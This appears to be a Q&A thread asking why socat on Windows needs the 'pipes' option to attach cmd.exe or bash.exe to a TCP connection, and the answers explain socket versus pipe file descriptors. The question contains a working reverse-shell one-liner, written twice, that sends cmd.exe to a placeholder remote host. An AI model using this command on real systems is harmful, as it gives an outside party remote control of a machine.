# SOCAT on WINDOWS: why do I need pipes option for EXEC address?

Tags: windows, shell, cmd.exe, socat

Trying to create a reverse shell, I used this one my windows box:
`socat -d -d TCP4:X.X.X.X:789 EXEC:'cmd.exe'`

which failed with the following error: "The process tried to write to a nonexistent pipe."

Using the `pipes` option, it now works:
`socat -d -d TCP4:X.X.X.X:789 EXEC:'cmd.exe',pipes`

My question is why `pipes` is necessary?

I know that `pipes` options will use named pipes instead of the default UNIX socket.
I am *assuming* that the default behavior is different in the windows implementation

Answer (score 3):

The `pipes` option is used to force cmd.exe or powershell to use Unix style standard input and output.

Answer (score 1):

I cannot tell about cmd.exe but about bash.exe/sh.exe.

On windows the network socket has one file descriptor which doesn't allow for `read()` calls. (see https://stackoverflow.com/questions/4778043/winsock-not-supporting-read-write but on my system `write()` seems to work)

bash.exe inherits that network connection (one file descriptor) and uses `write()` and `read()` which then fails. In Linux this would work, see https://man7.org/linux/man-pages/man2/recv.2.html

> "The only difference between recv() and read(2) is the presence of flags.-"

Invoked with `,pipes` socat will enter a bidirectional copy loop which operates on two unnamed pipes. bash.exe inherits that two artificial pipe ends (file descriptors) and works well because for pipes you actually can use `read()` and `write()`.